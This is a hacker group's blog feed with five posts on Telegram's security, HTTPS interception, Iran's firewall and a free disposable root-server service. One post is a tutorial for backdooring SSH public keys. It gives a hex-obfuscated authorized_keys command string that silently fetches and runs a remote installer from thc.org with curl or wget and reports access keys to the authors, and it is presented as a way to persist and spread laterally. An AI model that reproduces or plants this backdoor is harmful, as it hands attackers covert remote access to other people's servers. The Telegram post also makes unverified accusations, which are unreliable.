The Hacker's Choice

Keep Pavel Durov LOCKED UP

root — Mon, 26 Aug 2024 11:28:17 GMT

Pavel was not arrested because he criticised Macron. He was arrested because he (allegedly) facilitates a wide range of crimes, including drug trafficking and ransomware groups.

He should have also been arrested for LYING to the community and for his connection to the Kremlin.

Anyone who is wilfully and knowingly LYING to the citizens about security should be locked up. #NoSnakeOil

Telegram is NOT encrypted. All your chat history is stored on TG's servers. IN CLEAR. FOREVER (see below).
Telegram is a shady company (see below).
My gut says Telegram is an FSB operation.

I don't trust Telegram. Let's talk about my feelings:

In 2022, we took a look at Telegram's API. There is an undocumented API that allows an attacker (or the FSB) to DOWNLOAD any GROUP CHAT (where a bot is present). The attacker (or FSB) does not need to be in the group chat and does not need own the BOT. More so, the API smells like "lawful interception" all over the place.

This is possible even if the BOT is configured to have "NO access to messages".
Telegram's Disappearing Messages / Auto-Delete is a marketing farce. We exfiltrated ALL messages. Years and years of messages.
All usernames, meta-data, media, voice recordings, join-messages...it's all there and nicely curated as HTML.

Example:

TG developed a fancy looking data exfiltration API? With all the bells and whistles? Nicely curated output - and then not document it? FOR WHOM? Smells fishy to me.

NOTE: The attacker does not need to OWN the BOT. The attacker does not need to be inside the group chat either. The EXFILTRATION is possible unknowingly to the BOT's owner.

(Above example: THC did not own the BOT. THC was not in the group chat either. THC is not affiliated to the group. Yet, THC exfiltrated the entire chat history, using a series of undocumented API requests and cURL. The concern here is that such an exfil-API exists. Not how we exploited it. The image above is just from an innocent group chat of some random people....)

What else smells fishy

Russia banned Signal and designated WhatsApp (Meta) as "extremist organisation". Russians flock to Telegram instead - a NON-encrypted messaging App that has a government-style undocumented Data Exfiltration API. Go figure.
There was a "fake news" that TG got banned in Russia. That's not true. Instead, third parties were "temporarily" banned for using TG's API. All users (in Russia) were using TG just fine. No ban. No restrictions.
Pavel claims he left Russia because of his conflict with the Russian State. I think, in time, we will learn that Pavel left Russia so that he is in a better negotiation position with the FSB (He is harder to control while living abroad and less likely to commit "window suicides").
OSINT of Aeroflot shows that Pavel traveled to Russia 50 times between 2015 and 2021 (no leaks available after 2021). That's almost ONCE EVERY MONTH. Why does he claim he 'lives in Exil'?
Where are the white-papers of their engineers? Why don't we see them more often in the public? Like we see Moxie Marlinspike, Meredith Whittaker, Phil Zimmermann, ....
Why are TG's engineers missing at every IETF meeting where strong encryption and privacy is shaped?
Why is TG not open about their encryption? Why don't they allow peer-review? Or at least partly open it for public scrutiny?
Pavel applauded a smear campaign targeting SIGNAL - claiming that Signal is 'in bed with the government'. Bulkshit. We know the people who work at Signal since when we were kids. They have earned our trust - they have fought relentlessly to make encryption available to the masses - and fought relentlessly in many other arenas to help people escape authoritarian reach. (Russia bans Signal because it can not be intercepted🖕🖕🖕. TG gets promoted instead. Go figure.).
WhatsApp reported 1,5 MILLION cases to the NCMEC (Centre for Missing and Exploited Children). TG reported...a staggering...0 (ZERO) cases. Refused to join ANY international or non-gov organisation or charity to stop the exploitation and abuse of children. NOT ONE.
In June 2020, Putin praised TG as an example of "constructive cooperation". Meanwhile, Russian Anti-War bloggers on Telegram are disappearing like the flies.
On 20th of August 2024, Pavel traveled to Azerbaijan to meet Putin. Go figure.

Telegram wants to be a "Secure Messaging App" and "fight repressive governments"? Here are my tips:

Implement p2p encryption by default.
Open your source. Stop hiding your encryption. It's not secure unless it's peer-reviewed. What do you have to hide?
Your Data-Exfiltration API smells SORM/FSB compliant. DISABLE IT.
TG is the C2 of choice for (mostly) Russian ransomware groups. Be better at moderating it.
Be truthful that you store all messages, regardless of "auto delete"-settings forever on your servers. STOP LYING TO THE USER.
Make it obvious to non-tech users that TG is NOT secure. Not secure by default. That you keep and record every message ever sent - even if deleted by the user.
Stop this shady hiding. Be in the open. Show us who you are. Meet us at conferences. Come to the IETF. Show us what you got. Your skill-set beyond data-mining, data-retention and data-exfiltration.
Disclosure where your money comes from. Be open about your business plan. Show your accounts, beneficiaries, corporate structure and let's shine a light into every director's past.
Be more like SIGNAL or the EFF.

Other:

Note: Is it a bit harsh that we think Pavel should be locked up? Yes. Thanks for not just reading the headline. TG needs to fix their approach to Security, Privacy and Freedom. Imagine a car manufacture saying "That airbag works" when it ain't. When it never worked as promised. Get our drift here? TG is not secure. TG logs every message you send - forever, regardless if you delete the message or not. TG has some work to do.

Note: THC has a public channel on Telegram. Yes. We don't seek privacy for our public channel. You (or your favourite government) can shine a light up our arses and see that we ain't criminals. It is a PUBLIC channel.

For all else, find us on SIGNAL

Addendum

IMHO, the French reasons for the arrest are (all?) bogus (for now). It feels like they arrested him for nonsense so that they can 'talk' and hope to find out more about the (alleged) Pavel/Kremlin link or if Pavel benefits from the ransomware groups/Cartels either directly (TG's premium feature) or indirectly via bribes and benefits-in-kind (?). This does not set a good precedence.
I will release the API calls within 4-6 weeks (PM me if I forget). Let's give the TG users some time to disable their bots. Meanwhile, one researcher has contacted me privately, saying that he found the same API and used it to exfil TG data in the past. I'm not sure who was first or that it matters.
The attacker needs to know the BOT-Token (but does not need to be the owner of the BOT and does not need to have had any interaction with the BOT). We wanted to show that TG stores all messages in clear. TG of course has all BOT Tokens (and they dont need to use the TOKEN to access all messages in clear). We demonstrated that this is not just messages to and from the BOT but all messages of any group chat the BOT is in, even if the BOT is configured with "has_access_to_messages: false". We needed the BOT token to demonstrate this. TG does not need the BOT Token to access all messages in clear.
We contacted TG. Maybe they allow us to be part of the solution.

]]>

HTTPS Interception by a state actor in Germany

root — Sat, 21 Oct 2023 06:55:26 GMT

Some comments regarding the recently discovered Interception of HTTPS/TLS/SSL traffic by a state actor in Germany.

Ten years ago, in 2013, the IETF #88 (which is the standardization body of the Internet) declared that the Internet surveillance program by the NSA (Snowden leak) constitutes an "Attack against the Internet and the IETF". Ten years later, the Internet is still under attack. HTTPS is not safe. You browsing the Internet, doing online banking, forming a political opposition, or being a journalist, is not safe.

The interception happened at layer-7 of the ISO/OSI model. This is odd (for a state actor). Such an attack can be detected by observing the changing TCP counters (SEQ/ACK) and the TTL. The intercept should have been done at layer-3 and without changing the IP/TCP/TTL counters ...or the size of the packets.
The attacker made several mistakes. The most noticeable is the expired certificate, but also a bad CommonName (CN), TTL mess-up, network outage, and not utilizing a fully transparent proxy ...
The attacker messed up the ARP table.
The attacker did not steal the original certificate/key from the server.

The interception does not have the typical hallmarks of a professional state actor.

Recommendations for server admins and app developers:

Do not use a public Certification Authority. If you do, then the app/client should not load the entire CA bundle. It should only load the one CA that was used to sign the server's certificate.
Make use of Certificate Transparency (CT) and get notified when your issuer or another Certification Authority (CA) issues a new certificate for your domain name. Most modern browsers (but not all) reject any certificate that is not logged by CT. Most (all?) other TLS applications will accept unlogged certificates.
Other cloud services offer to regularly check your TLS services for a changing certificate. The attacker could easily decide to 'not intercept' the traffic from those crawlers/spiders.
Ultimately, it should be the client software that yells a warning when the server's certificate changes.
Certification Authority Authorization (CAA) is a voluntary option and it is not enforced by the browser or client. This will not happen anytime soon.
Make the server's certificate sticky. The client should yell a warning when the server's certificate changes, even if the new certificate is valid....and especially if the old certificate is not due for renewal. ???Is there a browser plugin that does this??? THIS CAN HAPPEN SOON*.*
Watch the TCP/IP/TTL counters. An incoming TCP with TTL>=62 means it's not a real user but an attacker/MitM connecting to your server 🤗, (we pity the state actor for messing this up).
Store your server's key on an encrypted volume that does not auto-mount. To which only YOU have the password, (not AWS encrypted EBS, to which AWS holds the password). It's a pain because the server won't restart automatically after a reboot: It needs an admin to enter the password - but that's the world we are living in. Get used to it.

There is a wider problem: Attacks always get better. Here are two problems to ponder about:

State actors have access to the underlying VPS storage device (volume). They don't need to create a 'new' certificate using LetsEncrypt. Instead, they can steal the existing one from the server without the server noticing it, and without having to log in to the VPS server. ???Why didn't they??? THAT IS THE ATTACKER'S OBVIOUS NEXT MOVE.
Cloud Service Providers use EDGE servers (Cloudflare and all others). They do 'Interception' as a feature: When you configure a cloud server with 'edge' support then your server's key is loaded to the Cloud's edge. All traffic is then decrypted at the edge (aka the "TLS border gateway"). E2EE is dead. It's more like 'encrypted to the first EDGE and then all is cleartext (and readable by the Edge-Provider and state actors) until the traffic reaches your server'.

This type of attack, (when the server's private key is stolen), is hard to defend against, but easily performed by an attacker. One way to make this attack harder:

Enforce Client authentication with client keys (like SSH does). Don't use passwords. Ever.
Compare the ECDH shared-secret that Alice and Bob negotiated during kex (KexEchange). When under MitM attack, this shared-secret will be different for Alice and Bob (when normally it would not): Malice, sucks to be her, cannot guess the public part of the ECDH pair. She needs to generate her own public ECDH pair, one for the Alice-side, and another one for the Bob-Side of the intercepted connection. Malice will intercept with the two different shared-secrets. Alice and Bob will end up with a different shared-secret when under attack.

Other: https://www.devever.net/~hl/xmpp-incident

Like talking about cryptography and security? We get a hard-on every time. Join us on Telegram: https://t.me/thcorg.

]]>

Infecting SSH Public Keys with backdoors

root — Wed, 24 May 2023 10:52:25 GMT

In this article, you will learn how to add a backdoor to the SSH Public Key. The backdoor will execute whenever the user logs in. The backdoor hides as an unreadable long hex-string inside ~/.ssh/authorized_keys or ~/.ssh/id_*.pub.

The source is available from GitHub.

TL;DR

Simply prepend any SSH Public Key with the following backdoor-string - up until, but not including, the ssh-ed25519 AAAAC3Nzblah...):

no-user-rc,no-X11-forwarding,command="`###---POWERSHELL---`;eval $(echo 5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922207c7c2062617368202d632022242877676574202d2d6e6f2d766572626f7365202d4f2d207468632e6f72672f737368782922207c7c206578697420303b7d203e2f6465762f6e756c6c20323e2f6465762f6e756c6c2026203a3b5b5b202d6e20245353485f4f524947494e414c5f434f4d4d414e44205d5d202626206578656320245353485f4f524947494e414c5f434f4d4d414e443b5b5b202d7a20245348454c4c205d5d202626205348454c4c3d2f62696e2f626173683b5b5b202d66202f72756e2f6d6f74642e64796e616d6963205d5d20262620636174202f72756e2f6d6f74642e64796e616d69633b5b5b202d66202f6574632f6d6f7464205d5d20262620636174202f6574632f6d6f74643b65786563202d61202d2428626173656e616d6520245348454c4c2920245348454c4c3b0a|xxd -r -ps);" ssh-ed25519 AAAAC3Nzblah....

Root is not needed.

What's the purpose

For the lulz.
Re-starts your backdoor after the server reboots (similar to infecting crontab or ~/.bashrc).
Spread laterally: Admins are known to copy their SSH Public Keys to new servers. Own them.
Cloud deployments often copy the Admin's Public Key to new instances - and now they copy your backdoor inside as well.

The nitty-gritty

OpenSSH has an unsung feature to execute a command (instead of a Shell) when a user successfully logs in. This feature (for example) is used by AWS to tell the customer not to log in as root:

no-port-forwarding,no-agent-forwarding,command="echo 'Please login as the user \"ubuntu\" rather than the user \"root\".';echo;sleep 10;exit 142" ssh-ed25519 AAAA...

The trick is to use OpenSSH's command= feature and silently start our backdoor and afterwards execute the user's shell (with PTY) without the user noticing it.

The Details

Let's dissect the backdoor-string: The no-user-rc,no-X11-forwarding is a ruse to throw off any prying eyes. It can be omitted.

The command= string is where the real magic happens. Here is a shorter version of a simplified backdoor-string:

command="`###---POWERSHELL---`;eval $(echo 6563686f2048656c6c6f204261636b646f6f72|xxd -r -ps)"

OpenSSH executes the entire string between the two quotes "...".

The `###---POWERSHELL---`; is a ruse as well. It does nothing.

The next command, eval, executes the commands that are hidden inside the encoded hex string.

Let's decode the hex string to reveal the actual commands that are being executed:

$ echo 6563686f2048656c6c6f204261636b646f6f72 | xxd -r -psecho Hello Backdoor

This simplified backdoor only prints "Hello Backdoor" on log-in and then terminates the SSH connection.

Our backdoor-string is more complex and decoded here:

[[ $(stat -c%Y /bin/sh) != $(stat -c%Y .ssh) ]] && {    touch -r /bin/sh .ssh    export KEY=""    bash -c "$(curl -fsSL thc.org/sshx)" || bash -c "$(wget --no-verbose -O- thc.org/sshx)" || exit 0} >/dev/null 2>/dev/null &[[ -n $SSH_ORIGINAL_COMMAND ]] && exec $SSH_ORIGINAL_COMMAND[[ -z $SHELL ]] && SHELL=/bin/bash[[ -f /run/motd.dynamic ]] && cat /run/motd.dynamic[[ -f /etc/motd ]] && cat /etc/motdexec -a -$(basename $SHELL) $SHELL

Firstly it uses a canary to make sure that the backdoor is only started once and not on every login: If ~/.ssh and /bin/sh have the same date then assume that the backdoor is already installed. Otherwise set them to the same date and execute the backdoor thereafter.

The backdoor in this case is a backdoor-installer script pulled from thc.org/sshx and executed in memory. It starts as a background process to not slow down the user's log-in. The installer-script installs gsocket and if successful reports the access key and system metrics to our discord channel.

Thereafter the backdoor-string checks if the user wanted to execute a command rather than a shell.

The last four lines are when the user logs in to a shell - the normal case:

Set the SHELL variable if not set already.
Simulate Linux's motd.
Execute the user's shell.

Keep Hacking,

The Hacker's Choice

]]>

The Iran Firewall - A preliminary report

root — Fri, 28 Oct 2022 12:45:11 GMT

I got sidetracked for the last 3 days to assess the Great Firewall of Iran (GFI).

TL;DR
The Internet is easily censored. The neo-liberals got their arses kicked. The big players like Google/Apple/AWS are partly to blame. China runs the GFI as a service.

The GFI uses Deep Packet Inspection (DPI) on all international peering points. In addition, the local operators (telco & DSL) use their own Firewall but most of them are static and badly configured. Some use DPI.

The GFI is port number agnostic and changing the port number of a service will not yield success.

The GFI consists of three parts:

All blacklisted domains resolve to 10.0.34.35
An active component constantly scans Iran's internal network for 'hostile' services (like open Socks5 proxies).
IP addresses are rarely fully blocked. Instead, the TCP 3-way handshake won't complete (the syn-ack is dropped).

The GFI seems to operate differently almost every day - from severe disruption to barely any disruption.

The most severe disruption is when the regime turns off all cell towers and all local Internet. They just pull the plug and it's game over for any neo-liberal smart-arse that thinks V2ray/Tor/Shadowsocks is the solution.

All Free Internet is blocked from all Mobile Phones and some DSL connections between 4pm and 12pm (it's OFF). During these hours only VPSs inside of Iran can (sometimes) access the Free Internet. Volunteers are running V2Ray/Shadowsocks/etc relays on VPSs inside of Iran to reach the Free Internet. Those relays last hours or a few days before getting blocked by the GFI (The VPS provider is legally obligated to shut them down thereafter).

At the moment the Free Internet is mostly only accessible to geeks and those who can tunnel out using various protocols and tricks.

The worst affected are the ordinary citizens. The GFI blocks them effectively. Many people (and mostly women) depend on the Free Internet for work. The illegal regime of Iran uses the GFI as a form of blackmail - to run them out of money (and by that out of their independency).

On bad days:

Tor is blocked (since day 1).
Wireguard/OpenVpn is blocked (since day 1)
V2ray/Vmess/Shadowsocks/... are either permanently blocked or blocked as soon as the IP Address of the EXIT node becomes known.
The DPI blocks on TLS's cleartext SNI.
Any outbound traffic is blocked after 1k-4k is transmitted upstream.
Any website that offers VPN solutions is blocked (ProtonVPN, Mullvad, NordVPN, ..). Those who already had the software before the GFI can not use the software (most apps require to register an account or make an API call to a WebRTC - which is blocked).
Cloudflare is blocked (including DoH/DoT/DoQ).
Docker is sometimes blocked.
Google Play and App Store are blocked.
Some operators use a whitelist and block all other websites.

The most blocking local operator is IR-MCI (aka HamrahAvval). They seem to be regime lovers.

The users of Iran can not get to the software that would help them to circumvent the GFI. This is mostly a failing of Google/Apple and the big players: It is no longer (easily) possible to copy software from one device to another (or when the network is down).

China is involved. Connecting to any random port number from the outside world on any server inside of Iran (passing the GFI) is almost always followed by a port probe on that specific port from an IP address belonging to China.

The filtering on TLS by SNI is embarrassing. TLS is not secure until the SNI is encrypted. I was there at the IETF-88 (9 years ago) and part of the TLS-Working group when Eric Rescorla famously said that encrypted SNI is no priority and that the big players like Google/Apple/Facebook/AWS all want speed (lower RTT) over security. We tried hard to convince the players but got shut down.

The GFI extends to SMS and OTP. The users (if they get Internet) can not log in to their accounts or sign up for new services (WhatsApp/Signal/VPN/..): Many services rely on 2FA by SMS/OTP. Those SMS/OTP messages are dropped by the Mobile Operators. 2FA becomes a DoS. Checkmate.

Recommendation:

The big players (Google/Apple) should implement a feature that allows users to share apps with friends (via Bluetooth) when the network is down.
VPN Providers should make their apps work when above mentioned restrictions are in place.
A mesh-like networking method is needed (using local wifi or Bluetooth) when the main network goes down.
Encrypted SNI needs to happen without fallback to non-encrypted SNI.
Exemption from sanctions to get Starlink and other equipment into the country and a transport method (Customs and Border Control seizes shipments. Donkeys and smugglers are at their capacity limit and not reliable enough).
"How to stage a rebellion effectively" should be part of the school's syllabus. In the decades to come the knowledge to rebel against oppression and tyranny will be more useful to our children than knowing about Nietzsche or why Bonobo Apes are so happy.
Does China breach sanctions by providing the GFI as a service?
Iran signed the Universal Declaration of Human Rights. May the UN comment on why Iran is allowed to disregard it and what that means for the integrity of the UN if members can pick and choose at will.

Thank you to all the courageous people of Iran who provided me with access to various servers and DSL systems. You are the true heroes.

Stay safe and read our IT Security and Privacy for the rebellions around the world.

~~THC operates a variety of EXIT nodes and Proxy Services in Iran.~~ We need help. Join us on Telegram.

Addition: After writing this article I got asked about the most reliable way to circumvent the GFI. A relay host inside of Iran is needed (Iran-Relay) and an EXIT node outside of Iran (EU-EXIT). The Iran-User and the EU-EXIT node both need to connect TO the Iran-Relay (connecting from the Iran-Relay TO EU-EXIT is sometimes blocked). Iran-User and EU-EXIT "meet" at the Iran-Relay. Iran-User TO Iran-Relay traffic needs to be obfuscated (V2ray/Shadowsocks/ssh is effective). EU-EXIT to Iran-Relay needs to be less obfuscate (SSH works just fine). No software needs to run on the Iran-Relay to give Iran-Relay admin plausible deniability. No IP must be logged. ~~This is the setup that THC is providing~~.

~~The most widely adopted solution however is a V2Ray/Shadowsock connection from Iran-User to the Iran-Relay and the iptables DNAT to EU-EXIT - It seems to work most (but not all) of the times.~~

The most widely adopted solution is XTLS/Trojan gRPC.

There are many Firewalls at play with the main one being at the international junction point doing DPI.

Domain Fronting and SNI faking are not reliable. It may work for a few days until the Freedom-IP is blacklisted. The GFI has now almost fully transitioned to a 'whitelisting' model where everything is blocked or throttled to 0-10Mbit unless the flow is to a whitelisted SNI on a whitelisted IP. Running your own Exit Node in Freedom only works for 1-3 weeks on average until the IP (or entire AS) gets blacklisted or throttled.

]]>

Disposable Root Servers

root — Fri, 14 Oct 2022 08:57:08 GMT

We love to research, explore, play and tinker. This journey almost always starts on a Linux Root Shell. Let this be the start of your journey. Use SSH and connect:

ssh root@segfault.net # Password is 'segfault'

Every SSH connection spawns a new Root Server for you to use. Check out the release page for more information and what you can do with it.

It allows anyone to use a disposable linux root server. The Server only exists while you are logged in. It self-destructs after log out. It comes with many many features. Here are just a few:

Encrypted Filesystem (only you know the password to unlock it).
Over 8GB of the finest hacking/coding tools pre-installed.
Outbound traffic is routed via a selection of constantly rotating VPN peers.
Encrypted DNS.
Reverse Port Forwards (forget ngrok. This is free & better).
Your server will self-destruct on log out (and all data & traces will get wiped).

Mission

This is for hackers and coders who like to experiment on a fresh and clean Linux Server that is safely connected to the Internet. It shall be used for good purposes only.

As hackers¹, we have no interest in money or financial gains. We do not care if our research is liked or disliked, used or discarded. We are here for the journey. To learn and to push the limits and seek the unknown. We research for the sake of researching.

This is a free service. THC asks for nothing in return but encourages you to join our Telegram Channel. Take part in the discussions, share your knowledge and ask your questions.

History

This is the resurrection of our 1997 'segfault.net' root server. The server of '97 served as a stepping stone for many hackers, coders and researchers. It's where we hosted phrack, Team Teso, HERT, Hack in the Box, the first encrypted IRC network and many others.

I shut it down in 2019. Now it's back.

Better, faster, more secure and as a cloud service - for anyone to enjoy.

Is it safe?

Nobody ever got arrested for choosing segfault.net.

Do not confuse hackers with criminals. Somebody who uses hacking techniques to commit a crime is not a hacker. He is a criminal. The same way that somebody who uses an axe to murder is not a lumberjack. Criminals disgust us.

]]>